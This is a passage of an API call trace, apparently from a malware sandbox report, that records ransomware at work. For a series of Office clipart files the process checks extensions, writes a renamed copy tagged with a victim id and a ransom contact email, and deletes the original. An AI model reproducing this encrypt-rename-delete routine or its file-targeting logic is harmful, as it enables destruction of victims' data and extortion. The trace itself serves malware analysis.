(lpString1=".doc", lpString2=".WMF") returned -1 [0199.215] lstrlenW (lpString=".docx") returned 5 [0199.215] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1 [0199.215] lstrlenW (lpString=".pdf") returned 4 [0199.215] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0199.215] lstrlenW (lpString=".xls") returned 4 [0199.215] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0199.215] lstrlenW (lpString=".xlsx") returned 5 [0199.215] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1 [0199.215] lstrlenW (lpString=".ppt") returned 4 [0199.215] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0199.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0197979.WMF") returned 68 [0199.215] lstrlenW (lpString=".zip") returned 4 [0199.215] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.215] lstrlenW (lpString=".rar") returned 4 [0199.215] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.215] lstrlenW (lpString=".bz2") returned 4 [0199.215] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0199.215] lstrlenW (lpString=".7z") returned 3 [0199.215] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0199.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0197979.WMF") returned 68 [0199.215] lstrlenW (lpString=".dbf") returned 4 [0199.215] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0197979.WMF") returned 68 [0199.215] lstrlenW (lpString=".1cd") returned 4 [0199.215] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0199.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0197979.WMF") returned 68 [0199.215] lstrlenW (lpString=".jpg") returned 4 [0199.215] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0199.216] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.216] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.216] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0197983.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0197983.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0199.217] GetLastError () returned 0x0 [0199.217] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x668c, lpOverlapped=0x0) returned 1 [0199.332] WriteFile (in: hFile=0x340, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x6690, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x6690, lpOverlapped=0x0) returned 1 [0199.334] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0199.334] WriteFile (in: hFile=0x340, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0199.334] SetEndOfFile (hFile=0x340) returned 1 [0199.334] CloseHandle (hObject=0x340) returned 1 [0199.334] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.334] SetEndOfFile (hFile=0x37c) returned 1 [0199.335] CloseHandle (hObject=0x37c) returned 1 [0199.335] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0197983.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0199.335] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0197983.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0197983.wmf")) returned 1 [0199.336] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0197983.WMF") returned 68 [0199.336] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0197983.WMF") returned 68 [0199.336] lstrlenW (lpString=".doc") returned 4 [0199.336] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0199.336] lstrlenW (lpString=".docx") returned 5 [0199.336] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1 [0199.336] lstrlenW (lpString=".pdf") returned 4 [0199.336] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0199.337] lstrlenW (lpString=".xls") returned 4 [0199.337] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0199.337] lstrlenW (lpString=".xlsx") returned 5 [0199.337] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1 [0199.337] lstrlenW (lpString=".ppt") returned 4 [0199.337] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0199.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0197983.WMF") returned 68 [0199.337] lstrlenW (lpString=".zip") returned 4 [0199.337] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.337] lstrlenW (lpString=".rar") returned 4 [0199.337] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.337] lstrlenW (lpString=".bz2") returned 4 [0199.337] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0199.337] lstrlenW (lpString=".7z") returned 3 [0199.337] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0199.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0197983.WMF") returned 68 [0199.337] lstrlenW (lpString=".dbf") returned 4 [0199.337] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0197983.WMF") returned 68 [0199.337] lstrlenW (lpString=".1cd") returned 4 [0199.337] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0199.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0197983.WMF") returned 68 [0199.337] lstrlenW (lpString=".jpg") returned 4 [0199.337] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0199.338] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.338] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.338] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198226.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198226.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0199.338] GetLastError () returned 0x0 [0199.338] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0xa3b2, lpOverlapped=0x0) returned 1 [0199.454] WriteFile (in: hFile=0x340, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xa3c0, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xa3c0, lpOverlapped=0x0) returned 1 [0199.455] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0199.456] WriteFile (in: hFile=0x340, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0199.456] SetEndOfFile (hFile=0x340) returned 1 [0199.456] CloseHandle (hObject=0x340) returned 1 [0199.456] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.456] SetEndOfFile (hFile=0x37c) returned 1 [0199.457] CloseHandle (hObject=0x37c) returned 1 [0199.457] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198226.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0199.457] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198226.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198226.wmf")) returned 1 [0199.458] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198226.WMF") returned 68 [0199.458] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198226.WMF") returned 68 [0199.458] lstrlenW (lpString=".doc") returned 4 [0199.458] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0199.458] lstrlenW (lpString=".docx") returned 5 [0199.458] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0199.458] lstrlenW (lpString=".pdf") returned 4 [0199.458] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0199.458] lstrlenW (lpString=".xls") returned 4 [0199.458] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0199.458] lstrlenW (lpString=".xlsx") returned 5 [0199.458] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0199.458] lstrlenW (lpString=".ppt") returned 4 [0199.458] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0199.458] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198226.WMF") returned 68 [0199.458] lstrlenW (lpString=".zip") returned 4 [0199.458] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.458] lstrlenW (lpString=".rar") returned 4 [0199.458] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.458] lstrlenW (lpString=".bz2") returned 4 [0199.458] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0199.458] lstrlenW (lpString=".7z") returned 3 [0199.458] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0199.459] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198226.WMF") returned 68 [0199.459] lstrlenW (lpString=".dbf") returned 4 [0199.459] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.459] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198226.WMF") returned 68 [0199.459] lstrlenW (lpString=".1cd") returned 4 [0199.459] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0199.459] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198226.WMF") returned 68 [0199.459] lstrlenW (lpString=".jpg") returned 4 [0199.459] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0199.459] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.459] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.459] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198447.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198447.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0199.460] GetLastError () returned 0x0 [0199.460] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0xc20c, lpOverlapped=0x0) returned 1 [0199.792] WriteFile (in: hFile=0x340, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xc210, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xc210, lpOverlapped=0x0) returned 1 [0199.794] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0199.794] WriteFile (in: hFile=0x340, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0199.794] SetEndOfFile (hFile=0x340) returned 1 [0199.794] CloseHandle (hObject=0x340) returned 1 [0199.794] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.794] SetEndOfFile (hFile=0x37c) returned 1 [0199.795] CloseHandle (hObject=0x37c) returned 1 [0199.795] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198447.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0199.795] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198447.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198447.wmf")) returned 1 [0199.796] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198447.WMF") returned 68 [0199.796] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198447.WMF") returned 68 [0199.796] lstrlenW (lpString=".doc") returned 4 [0199.796] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0199.796] lstrlenW (lpString=".docx") returned 5 [0199.796] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1 [0199.796] lstrlenW (lpString=".pdf") returned 4 [0199.796] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0199.796] lstrlenW (lpString=".xls") returned 4 [0199.796] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0199.796] lstrlenW (lpString=".xlsx") returned 5 [0199.796] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1 [0199.796] lstrlenW (lpString=".ppt") returned 4 [0199.796] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0199.796] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198447.WMF") returned 68 [0199.796] lstrlenW (lpString=".zip") returned 4 [0199.796] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.796] lstrlenW (lpString=".rar") returned 4 [0199.796] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.796] lstrlenW (lpString=".bz2") returned 4 [0199.796] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0199.796] lstrlenW (lpString=".7z") returned 3 [0199.797] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0199.797] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198447.WMF") returned 68 [0199.797] lstrlenW (lpString=".dbf") returned 4 [0199.797] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.797] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198447.WMF") returned 68 [0199.797] lstrlenW (lpString=".1cd") returned 4 [0199.797] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0199.797] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198447.WMF") returned 68 [0199.797] lstrlenW (lpString=".jpg") returned 4 [0199.797] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0199.797] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.797] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.797] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199423.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199423.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0199.798] GetLastError () returned 0x0 [0199.798] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x662a, lpOverlapped=0x0) returned 1 [0199.906] WriteFile (in: hFile=0x340, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x6630, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x6630, lpOverlapped=0x0) returned 1 [0199.907] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0199.907] WriteFile (in: hFile=0x340, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0199.907] SetEndOfFile (hFile=0x340) returned 1 [0199.908] CloseHandle (hObject=0x340) returned 1 [0199.908] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.908] SetEndOfFile (hFile=0x37c) returned 1 [0199.909] CloseHandle (hObject=0x37c) returned 1 [0199.909] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199423.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0199.909] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199423.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199423.wmf")) returned 1 [0199.909] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199423.WMF") returned 68 [0199.909] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199423.WMF") returned 68 [0199.910] lstrlenW (lpString=".doc") returned 4 [0199.910] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0199.910] lstrlenW (lpString=".docx") returned 5 [0199.910] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1 [0199.910] lstrlenW (lpString=".pdf") returned 4 [0199.910] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0199.910] lstrlenW (lpString=".xls") returned 4 [0199.910] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0199.910] lstrlenW (lpString=".xlsx") returned 5 [0199.910] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1 [0199.910] lstrlenW (lpString=".ppt") returned 4 [0199.910] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0199.910] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199423.WMF") returned 68 [0199.910] lstrlenW (lpString=".zip") returned 4 [0199.910] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.910] lstrlenW (lpString=".rar") returned 4 [0199.910] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.910] lstrlenW (lpString=".bz2") returned 4 [0199.910] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0199.910] lstrlenW (lpString=".7z") returned 3 [0199.910] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0199.910] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199423.WMF") returned 68 [0199.910] lstrlenW (lpString=".dbf") returned 4 [0199.910] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.910] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199423.WMF") returned 68 [0199.910] lstrlenW (lpString=".1cd") returned 4 [0199.910] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0199.910] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199423.WMF") returned 68 [0199.910] lstrlenW (lpString=".jpg") returned 4 [0199.910] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0199.911] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.911] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.911] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199473.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199473.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0199.911] GetLastError () returned 0x0 [0199.911] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x2a18, lpOverlapped=0x0) returned 1 [0200.064] WriteFile (in: hFile=0x340, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x2a20, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x2a20, lpOverlapped=0x0) returned 1 [0200.065] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0200.065] WriteFile (in: hFile=0x340, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0200.065] SetEndOfFile (hFile=0x340) returned 1 [0200.065] CloseHandle (hObject=0x340) returned 1 [0200.065] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.065] SetEndOfFile (hFile=0x37c) returned 1 [0200.066] CloseHandle (hObject=0x37c) returned 1 [0200.066] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199473.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0200.066] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199473.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199473.wmf")) returned 1 [0200.067] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199473.WMF") returned 68 [0200.067] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199473.WMF") returned 68 [0200.067] lstrlenW (lpString=".doc") returned 4 [0200.067] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0200.067] lstrlenW (lpString=".docx") returned 5 [0200.067] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1 [0200.067] lstrlenW (lpString=".pdf") returned 4 [0200.067] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0200.067] lstrlenW (lpString=".xls") returned 4 [0200.067] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0200.067] lstrlenW (lpString=".xlsx") returned 5 [0200.067] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1 [0200.067] lstrlenW (lpString=".ppt") returned 4 [0200.067] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0200.067] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199473.WMF") returned 68 [0200.067] lstrlenW (lpString=".zip") returned 4 [0200.067] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.067] lstrlenW (lpString=".rar") returned 4 [0200.067] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.068] lstrlenW (lpString=".bz2") returned 4 [0200.068] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0200.068] lstrlenW (lpString=".7z") returned 3 [0200.068] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0200.068] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199473.WMF") returned 68 [0200.068] lstrlenW (lpString=".dbf") returned 4 [0200.068] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.068] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199473.WMF") returned 68 [0200.068] lstrlenW (lpString=".1cd") returned 4 [0200.068] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0200.068] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199473.WMF") returned 68 [0200.068] lstrlenW (lpString=".jpg") returned 4 [0200.068] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0200.068] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.068] SetFilePointerEx (in: hFile=0x37c, 